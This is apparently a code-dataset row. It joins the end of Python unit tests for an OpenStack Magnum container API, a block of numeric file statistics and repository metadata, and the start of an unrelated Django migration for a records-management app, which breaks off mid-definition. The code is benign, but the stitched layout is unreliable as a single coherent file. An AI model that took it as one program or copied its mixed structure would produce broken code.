'"bay_uuid": "fff114da-3bfa-4a0f-a123-c0dffad9718e"}')
response = self.app.post('/v1/containers',
params=params,
content_type='application/json')
self.assertEqual(response.status_int, 201)
# get all containers
container = objects.Container.list(self.context)[0]
container.status = 'Stopped'
mock_container_show.return_value = container
response = self.app.get('/v1/containers')
self.assertEqual(response.status_int, 200)
self.assertEqual(1, len(response.json))
c = response.json['containers'][0]
self.assertIsNotNone(c.get('uuid'))
self.assertEqual('My Docker', c.get('name'))
self.assertEqual('env', c.get('command'))
self.assertEqual('Stopped', c.get('status'))
# Delete the container we created
response = self.app.delete('/v1/containers/%s' % c.get('uuid'))
self.assertEqual(response.status_int, 204)
response = self.app.get('/v1/containers')
self.assertEqual(response.status_int, 200)
c = response.json['containers']
self.assertEqual(0, len(c))
self.assertTrue(mock_container_create.called)
@patch('magnum.conductor.api.API.container_create')
def test_create_container_without_name(self, mock_container_create):
# No name param
params = ('{"image": "ubuntu", "command": "env",'
'"bay_uuid": "fff114da-3bfa-4a0f-a123-c0dffad9718e"}')
self.assertRaises(AppError, self.app.post, '/v1/containers',
params=params, content_type='application/json')
self.assertTrue(mock_container_create.not_called)
@patch('magnum.conductor.api.API.container_create')
def test_create_container_invalid_long_name(self, mock_container_create):
# Long name
params = ('{"name": "' + 'i' * 256 + '", "image": "ubuntu",'
'"command": "env",'
'"bay_uuid": "fff114da-3bfa-4a0f-a123-c0dffad9718e"}')
self.assertRaises(AppError, self.app.post, '/v1/containers',
params=params, content_type='application/json')
self.assertTrue(mock_container_create.not_called)
@patch('magnum.conductor.api.API.container_show')
@patch('magnum.objects.Container.list')
def test_get_all_containers(self, mock_container_list,
mock_container_show):
test_container = utils.get_test_container()
containers = [objects.Container(self.context, **test_container)]
mock_container_list.return_value = containers
mock_container_show.return_value = containers[0]
response = self.app.get('/v1/containers')
mock_container_list.assert_called_once_with(mock.ANY,
1000, None, sort_dir='asc',
sort_key='id')
self.assertEqual(response.status_int, 200)
actual_containers = response.json['containers']
self.assertEqual(len(actual_containers), 1)
self.assertEqual(actual_containers[0].get('uuid'),
test_container['uuid'])
@patch('magnum.conductor.api.API.container_show')
@patch('magnum.objects.Container.list')
def test_get_all_containers_with_pagination_marker(self,
mock_container_list,
mock_container_show):
container_list = []
for id_ in range(4):
test_container = utils.create_test_container(
id=id_, uuid=comm_utils.generate_uuid())
container_list.append(objects.Container(self.context,
**test_container))
mock_container_list.return_value = container_list[-1:]
mock_container_show.return_value = container_list[-1]
response = self.app.get('/v1/containers?limit=3&marker=%s'
% container_list[2].uuid)
self.assertEqual(response.status_int, 200)
actual_containers = response.json['containers']
self.assertEqual(1, len(actual_containers))
self.assertEqual(container_list[-1].uuid,
actual_containers[0].get('uuid'))
@patch('magnum.conductor.api.API.container_show')
@patch('magnum.objects.Container.list')
def test_detail_containers_with_pagination_marker(self,
mock_container_list,
mock_container_show):
container_list = []
for id_ in range(4):
test_container = utils.create_test_container(
id=id_, uuid=comm_utils.generate_uuid())
container_list.append(objects.Container(self.context,
**test_container))
mock_container_list.return_value = container_list[-1:]
mock_container_show.return_value = container_list[-1]
response = self.app.get('/v1/containers/detail?limit=3&marker=%s'
% container_list[2].uuid)
self.assertEqual(response.status_int, 200)
actual_containers = response.json['containers']
self.assertEqual(1, len(actual_containers))
self.assertEqual(container_list[-1].uuid,
actual_containers[0].get('uuid'))
self.assertIn('name', actual_containers[0])
self.assertIn('bay_uuid', actual_containers[0])
self.assertIn('status', actual_containers[0])
self.assertIn('image', actual_containers[0])
self.assertIn('command', actual_containers[0])
@patch('magnum.conductor.api.API.container_show')
@patch('magnum.objects.Container.list')
def test_get_all_containers_with_exception(self, mock_container_list,
mock_container_show):
test_container = utils.get_test_container()
containers = [objects.Container(self.context, **test_container)]
mock_container_list.return_value = containers
mock_container_show.side_effect = Exception
response = self.app.get('/v1/containers')
mock_container_list.assert_called_once_with(mock.ANY,
1000, None, sort_dir='asc',
sort_key='id')
self.assertEqual(response.status_int, 200)
actual_containers = response.json['containers']
self.assertEqual(len(actual_containers), 1)
self.assertEqual(actual_containers[0].get('uuid'),
test_container['uuid'])
self.assertEqual(actual_containers[0].get('status'),
fields.ContainerStatus.UNKNOWN)
@patch('magnum.conductor.api.API.container_show')
@patch('magnum.objects.Container.get_by_uuid')
def test_get_one_by_uuid(self, mock_container_get_by_uuid,
mock_container_show):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_container_get_by_uuid.return_value = test_container_obj
mock_container_show.return_value = test_container_obj
response = self.app.get('/v1/containers/%s' % test_container['uuid'])
mock_container_get_by_uuid.assert_called_once_with(
mock.ANY,
test_container['uuid'])
self.assertEqual(response.status_int, 200)
self.assertEqual(response.json['uuid'],
test_container['uuid'])
@patch('magnum.conductor.api.API.container_show')
@patch('magnum.objects.Container.get_by_name')
def test_get_one_by_name(self, mock_container_get_by_name,
mock_container_show):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_container_get_by_name.return_value = test_container_obj
mock_container_show.return_value = test_container_obj
response = self.app.get('/v1/containers/%s' % test_container['name'])
mock_container_get_by_name.assert_called_once_with(
mock.ANY,
test_container['name'])
self.assertEqual(response.status_int, 200)
self.assertEqual(response.json['uuid'],
test_container['uuid'])
@patch('magnum.objects.Container.get_by_uuid')
def test_patch_by_uuid(self, mock_container_get_by_uuid):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_container_get_by_uuid.return_value = test_container_obj
with patch.object(test_container_obj, 'save') as mock_save:
params = [{'path': '/name',
'value': 'new_name',
'op': 'replace'}]
container_uuid = test_container.get('uuid')
response = self.app.patch_json(
'/v1/containers/%s' % container_uuid,
params=params)
mock_save.assert_called_once_with()
self.assertEqual(response.status_int, 200)
self.assertEqual(test_container_obj.name, 'new_name')
@patch('magnum.objects.Container.get_by_name')
def test_patch_by_name(self, mock_container_get_by_name):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_container_get_by_name.return_value = test_container_obj
with patch.object(test_container_obj, 'save') as mock_save:
params = [{'path': '/name',
'value': 'new_name',
'op': 'replace'}]
container_name = test_container.get('name')
response = self.app.patch_json(
'/v1/containers/%s' % container_name,
params=params)
mock_save.assert_called_once_with()
self.assertEqual(response.status_int, 200)
self.assertEqual(test_container_obj.name, 'new_name')
def _action_test(self, container, action, ident_field):
test_container_obj = objects.Container(self.context, **container)
ident = container.get(ident_field)
get_by_ident_loc = 'magnum.objects.Container.get_by_%s' % ident_field
with patch(get_by_ident_loc) as mock_get_by_indent:
mock_get_by_indent.return_value = test_container_obj
response = self.app.put('/v1/containers/%s/%s' % (ident,
action))
self.assertEqual(response.status_int, 200)
# Only PUT should work, others like GET should fail
self.assertRaises(AppError, self.app.get,
('/v1/containers/%s/%s' %
(ident, action)))
@patch('magnum.conductor.api.API.container_start')
def test_start_by_uuid(self, mock_container_start):
mock_container_start.return_value = ""
test_container = utils.get_test_container()
self._action_test(test_container, 'start', 'uuid')
mock_container_start.assert_called_once_with(
test_container.get('uuid'))
@patch('magnum.conductor.api.API.container_start')
def test_start_by_name(self, mock_container_start):
mock_container_start.return_value = ""
test_container = utils.get_test_container()
self._action_test(test_container, 'start', 'name')
mock_container_start.assert_called_once_with(
test_container.get('uuid'))
@patch('magnum.conductor.api.API.container_stop')
def test_stop_by_uuid(self, mock_container_stop):
mock_container_stop.return_value = ""
test_container = utils.get_test_container()
self._action_test(test_container, 'stop', 'uuid')
mock_container_stop.assert_called_once_with(
test_container.get('uuid'))
@patch('magnum.conductor.api.API.container_stop')
def test_stop_by_name(self, mock_container_stop):
mock_container_stop.return_value = ""
test_container = utils.get_test_container()
self._action_test(test_container, 'stop', 'name')
mock_container_stop.assert_called_once_with(
test_container.get('uuid'))
@patch('magnum.conductor.api.API.container_pause')
def test_pause_by_uuid(self, mock_container_pause):
mock_container_pause.return_value = ""
test_container = utils.get_test_container()
self._action_test(test_container, 'pause', 'uuid')
mock_container_pause.assert_called_once_with(
test_container.get('uuid'))
@patch('magnum.conductor.api.API.container_pause')
def test_pause_by_name(self, mock_container_pause):
mock_container_pause.return_value = ""
test_container = utils.get_test_container()
self._action_test(test_container, 'pause', 'name')
mock_container_pause.assert_called_once_with(
test_container.get('uuid'))
@patch('magnum.conductor.api.API.container_unpause')
def test_unpause_by_uuid(self, mock_container_unpause):
mock_container_unpause.return_value = ""
test_container = utils.get_test_container()
self._action_test(test_container, 'unpause', 'uuid')
mock_container_unpause.assert_called_once_with(
test_container.get('uuid'))
@patch('magnum.conductor.api.API.container_unpause')
def test_unpause_by_name(self, mock_container_unpause):
mock_container_unpause.return_value = ""
test_container = utils.get_test_container()
self._action_test(test_container, 'unpause', 'name')
mock_container_unpause.assert_called_once_with(
test_container.get('uuid'))
@patch('magnum.conductor.api.API.container_reboot')
def test_reboot_by_uuid(self, mock_container_reboot):
mock_container_reboot.return_value = ""
test_container = utils.get_test_container()
self._action_test(test_container, 'reboot', 'uuid')
mock_container_reboot.assert_called_once_with(
test_container.get('uuid'))
@patch('magnum.conductor.api.API.container_reboot')
def test_reboot_by_name(self, mock_container_reboot):
mock_container_reboot.return_value = ""
test_container = utils.get_test_container()
self._action_test(test_container, 'reboot', 'name')
mock_container_reboot.assert_called_once_with(
test_container.get('uuid'))
@patch('magnum.conductor.api.API.container_logs')
@patch('magnum.objects.Container.get_by_uuid')
def test_get_logs_by_uuid(self, mock_get_by_uuid, mock_container_logs):
mock_container_logs.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
response = self.app.get('/v1/containers/%s/logs' % container_uuid)
self.assertEqual(response.status_int, 200)
mock_container_logs.assert_called_once_with(container_uuid)
@patch('magnum.conductor.api.API.container_logs')
@patch('magnum.objects.Container.get_by_name')
def test_get_logs_by_name(self, mock_get_by_name, mock_container_logs):
mock_container_logs.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_name.return_value = test_container_obj
container_name = test_container.get('name')
container_uuid = test_container.get('uuid')
response = self.app.get('/v1/containers/%s/logs' % container_name)
self.assertEqual(response.status_int, 200)
mock_container_logs.assert_called_once_with(container_uuid)
@patch('magnum.conductor.api.API.container_logs')
@patch('magnum.objects.Container.get_by_uuid')
def test_get_logs_put_fails(self, mock_get_by_uuid, mock_container_logs):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
self.assertRaises(AppError, self.app.put,
'/v1/containers/%s/logs' % container_uuid)
self.assertFalse(mock_container_logs.called)
@patch('magnum.conductor.api.API.container_exec')
@patch('magnum.objects.Container.get_by_uuid')
def test_execute_command_by_uuid(self, mock_get_by_uuid,
mock_container_exec):
mock_container_exec.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
url = '/v1/containers/%s/%s' % (container_uuid, 'execute')
cmd = {'command': 'ls'}
response = self.app.put(url, cmd)
self.assertEqual(response.status_int, 200)
mock_container_exec.assert_called_once_with(container_uuid,
cmd['command'])
@patch('magnum.conductor.api.API.container_exec')
@patch('magnum.objects.Container.get_by_name')
def test_execute_command_by_name(self, mock_get_by_name,
mock_container_exec):
mock_container_exec.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_name.return_value = test_container_obj
container_name = test_container.get('name')
container_uuid = test_container.get('uuid')
url = '/v1/containers/%s/%s' % (container_name, 'execute')
cmd = {'command': 'ls'}
response = self.app.put(url, cmd)
self.assertEqual(response.status_int, 200)
mock_container_exec.assert_called_once_with(container_uuid,
cmd['command'])
@patch('magnum.conductor.api.API.container_delete')
@patch('magnum.objects.Container.get_by_uuid')
def test_delete_container_by_uuid(self, mock_get_by_uuid,
mock_container_delete):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
with patch.object(test_container_obj, 'destroy') as mock_destroy:
container_uuid = test_container.get('uuid')
response = self.app.delete('/v1/containers/%s' % container_uuid)
self.assertEqual(response.status_int, 204)
mock_container_delete.assert_called_once_with(container_uuid)
mock_destroy.assert_called_once_with()
@patch('magnum.conductor.api.API.container_delete')
@patch('magnum.objects.Container.get_by_name')
def test_delete_container_by_name(self, mock_get_by_name,
mock_container_delete):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_name.return_value = test_container_obj
with patch.object(test_container_obj, 'destroy') as mock_destroy:
container_name = test_container.get('name')
container_uuid = test_container.get('uuid')
response = self.app.delete('/v1/containers/%s' % container_name)
self.assertEqual(response.status_int, 204)
mock_container_delete.assert_called_once_with(container_uuid)
mock_destroy.assert_called_once_with()
class TestContainerEnforcement(api_base.FunctionalTest):
def _common_policy_check(self, rule, func, *arg, **kwarg):
self.policy.set_rules({rule: 'project:non_fake'})
exc = self.assertRaises(policy.PolicyNotAuthorized,
func, *arg, **kwarg)
self.assertTrue(exc.message.startswith(rule))
self.assertTrue(exc.message.endswith('disallowed by policy'))
def test_policy_disallow_get_all(self):
self._common_policy_check(
'container:get_all', self.get_json, '/containers')
def test_policy_disallow_get_one(self):
self._common_policy_check(
'container:get', self.get_json, '/containers/111-222-333')
def test_policy_disallow_detail(self):
self._common_policy_check(
'container:detail',
self.get_json,
'/containers/111-222-333/detail')
def test_policy_disallow_update(self):
test_container = utils.get_test_container()
container_uuid = test_container.get('uuid')
params = [{'path': '/name',
'value': 'new_name',
'op': 'replace'}]
self._common_policy_check(
'container:update', self.app.patch_json,
'/v1/containers/%s' % container_uuid, params)
def test_policy_disallow_create(self):
params = ('{"name": "' + 'i' * 256 + '", "image": "ubuntu",'
'"command": "env",'
'"bay_uuid": "fff114da-3bfa-4a0f-a123-c0dffad9718e"}')
self._common_policy_check(
'container:create', self.app.post, '/v1/containers', params)
def test_policy_disallow_delete(self):
self._common_policy_check(
'container:delete', self.app.delete,
'/v1/containers/%s' % comm_utils.generate_uuid())
| 46.953688
| 79
| 0.641375
| 3,143
| 27,374
| 5.264715
| 0.074133
| 0.10999
| 0.039886
| 0.045869
| 0.877077
| 0.839488
| 0.817913
| 0.801958
| 0.779477
| 0.751556
| 0
| 0.013323
| 0.251443
| 27,374
| 582
| 80
| 47.034364
| 0.794202
| 0.028823
| 0
| 0.72973
| 0
| 0
| 0.156716
| 0.09016
| 0
| 0
| 0
| 0
| 0.193347
| 1
| 0.087318
| false
| 0
| 0.018711
| 0.002079
| 0.114345
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c060c3dbdb3ad597b7da6633cb2d7be265059c38
| 25,061
|
py
|
Python
|
metarecord/migrations/0001_initial.py
|
kerkkoheiskanen/helerm
|
bdaf801a940d42325a1076b42bb0edef831fbac9
|
[
"MIT"
] | 2
|
2017-04-21T15:36:23.000Z
|
2020-12-04T09:32:39.000Z
|
metarecord/migrations/0001_initial.py
|
kerkkoheiskanen/helerm
|
bdaf801a940d42325a1076b42bb0edef831fbac9
|
[
"MIT"
] | 168
|
2016-10-05T12:58:41.000Z
|
2021-08-31T14:29:56.000Z
|
metarecord/migrations/0001_initial.py
|
kerkkoheiskanen/helerm
|
bdaf801a940d42325a1076b42bb0edef831fbac9
|
[
"MIT"
] | 7
|
2016-10-13T12:51:36.000Z
|
2021-01-21T13:05:04.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-13 20:37
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Action',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of creation')),
('modified_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of modification')),
('name', models.CharField(max_length=256, verbose_name='name')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='action_created', to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('modified_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='action_modified', to=settings.AUTH_USER_MODEL, verbose_name='modified by')),
],
options={
'verbose_name_plural': 'actions',
'verbose_name': 'action',
},
),
migrations.CreateModel(
name='Function',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of creation')),
('modified_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of modification')),
('function_id', models.CharField(max_length=16, verbose_name='function ID')),
('name', models.CharField(max_length=256, verbose_name='name')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='function_created', to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('modified_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='function_modified', to=settings.AUTH_USER_MODEL, verbose_name='modified by')),
('parent', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='metarecord.Function', verbose_name='parent')),
],
options={
'verbose_name_plural': 'functions',
'verbose_name': 'function',
},
),
migrations.CreateModel(
name='PersonalData',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of creation')),
('modified_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of modification')),
('value', models.CharField(max_length=256, verbose_name='value')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personaldata_created', to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('modified_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personaldata_modified', to=settings.AUTH_USER_MODEL, verbose_name='modified by')),
],
options={
'verbose_name_plural': 'personal data',
'verbose_name': 'personal data',
},
),
migrations.CreateModel(
name='Phase',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of creation')),
('modified_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of modification')),
('name', models.CharField(max_length=256, verbose_name='name')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='phase_created', to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('function', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='phases', to='metarecord.Function', verbose_name='function')),
('modified_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='phase_modified', to=settings.AUTH_USER_MODEL, verbose_name='modified by')),
('personal_data', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='phases', to='metarecord.PersonalData', verbose_name='personal data')),
],
options={
'verbose_name_plural': 'phases',
'verbose_name': 'phase',
},
),
migrations.CreateModel(
name='ProtectionClass',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of creation')),
('modified_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of modification')),
('value', models.CharField(max_length=256, verbose_name='value')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='protectionclass_created', to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('modified_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='protectionclass_modified', to=settings.AUTH_USER_MODEL, verbose_name='modified by')),
],
options={
'verbose_name_plural': 'protection classes',
'verbose_name': 'protection class',
},
),
migrations.CreateModel(
name='PublicityClass',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of creation')),
('modified_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of modification')),
('value', models.CharField(max_length=256, verbose_name='value')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='publicityclass_created', to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('modified_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='publicityclass_modified', to=settings.AUTH_USER_MODEL, verbose_name='modified by')),
],
options={
'verbose_name_plural': 'publicity classes',
'verbose_name': 'publicity class',
},
),
migrations.CreateModel(
name='Record',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of creation')),
('modified_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of modification')),
('type', models.CharField(max_length=64, verbose_name='type')),
('type_specifier', models.CharField(blank=True, max_length=256, verbose_name='type specifier')),
('action', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='records', to='metarecord.Action', verbose_name='action')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='record_created', to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('modified_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='record_modified', to=settings.AUTH_USER_MODEL, verbose_name='modified by')),
('personal_data', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='records', to='metarecord.PersonalData', verbose_name='personal data')),
('protection_class', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='records', to='metarecord.ProtectionClass', verbose_name='protection class')),
('publicity_class', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='records', to='metarecord.PublicityClass', verbose_name='publicity class')),
],
options={
'verbose_name_plural': 'records',
'verbose_name': 'record',
},
),
migrations.CreateModel(
name='RetentionPeriod',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of creation')),
('modified_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of modification')),
('value', models.IntegerField(verbose_name='value')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='retentionperiod_created', to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('modified_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='retentionperiod_modified', to=settings.AUTH_USER_MODEL, verbose_name='modified by')),
],
options={
'verbose_name_plural': 'retention periods',
'verbose_name': 'retention period',
},
),
migrations.CreateModel(
name='RetentionReason',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of creation')),
('modified_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of modification')),
('value', models.CharField(max_length=256, verbose_name='value')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='retentionreason_created', to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('modified_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='retentionreason_modified', to=settings.AUTH_USER_MODEL, verbose_name='modified by')),
],
options={
'verbose_name_plural': 'retention reasons',
'verbose_name': 'retention reason',
},
),
migrations.CreateModel(
name='SecurityPeriod',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of creation')),
('modified_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of modification')),
('value', models.IntegerField(verbose_name='value')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='securityperiod_created', to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('modified_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='securityperiod_modified', to=settings.AUTH_USER_MODEL, verbose_name='modified by')),
],
options={
'verbose_name_plural': 'security periods',
'verbose_name': 'security period',
},
),
migrations.CreateModel(
name='SecurityReason',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of creation')),
('modified_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of modification')),
('value', models.CharField(max_length=256, verbose_name='value')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='securityreason_created', to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('modified_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='securityreason_modified', to=settings.AUTH_USER_MODEL, verbose_name='modified by')),
],
options={
'verbose_name_plural': 'security reasons',
'verbose_name': 'security reasons',
},
),
migrations.CreateModel(
name='SocialSecurityNumber',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of creation')),
('modified_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of modification')),
('value', models.CharField(max_length=256, verbose_name='value')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='socialsecuritynumber_created', to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('modified_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='socialsecuritynumber_modified', to=settings.AUTH_USER_MODEL, verbose_name='modified by')),
],
options={
'verbose_name_plural': 'social security numbers',
'verbose_name': 'social security number',
},
),
migrations.AddField(
model_name='record',
name='retention_period',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='records', to='metarecord.RetentionPeriod', verbose_name='retention period'),
),
migrations.AddField(
model_name='record',
name='retention_reason',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='records', to='metarecord.RetentionReason', verbose_name='retention reason'),
),
migrations.AddField(
model_name='record',
name='security_period',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='records', to='metarecord.SecurityPeriod', verbose_name='security period'),
),
migrations.AddField(
model_name='record',
name='security_reason',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='records', to='metarecord.SecurityReason', verbose_name='security reason'),
),
migrations.AddField(
model_name='record',
name='social_security_number',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='records', to='metarecord.SocialSecurityNumber', verbose_name='social security number'),
),
migrations.AddField(
model_name='phase',
name='protection_class',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='phases', to='metarecord.ProtectionClass', verbose_name='protection class'),
),
migrations.AddField(
model_name='phase',
name='publicity_class',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='phases', to='metarecord.PublicityClass', verbose_name='publicity class'),
),
migrations.AddField(
model_name='phase',
name='retention_period',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='phases', to='metarecord.RetentionPeriod', verbose_name='retention period'),
),
migrations.AddField(
model_name='phase',
name='retention_reason',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='phases', to='metarecord.RetentionReason', verbose_name='retention reason'),
),
migrations.AddField(
model_name='phase',
name='security_period',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='phases', to='metarecord.SecurityPeriod', verbose_name='security period'),
),
migrations.AddField(
model_name='phase',
name='security_reason',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='phases', to='metarecord.SecurityReason', verbose_name='security reason'),
),
migrations.AddField(
model_name='phase',
name='social_security_number',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='phases', to='metarecord.SocialSecurityNumber', verbose_name='social security number'),
),
migrations.AddField(
model_name='function',
name='personal_data',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='functions', to='metarecord.PersonalData', verbose_name='personal data'),
),
migrations.AddField(
model_name='function',
name='protection_class',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='functions', to='metarecord.ProtectionClass', verbose_name='protection class'),
),
migrations.AddField(
model_name='function',
name='publicity_class',
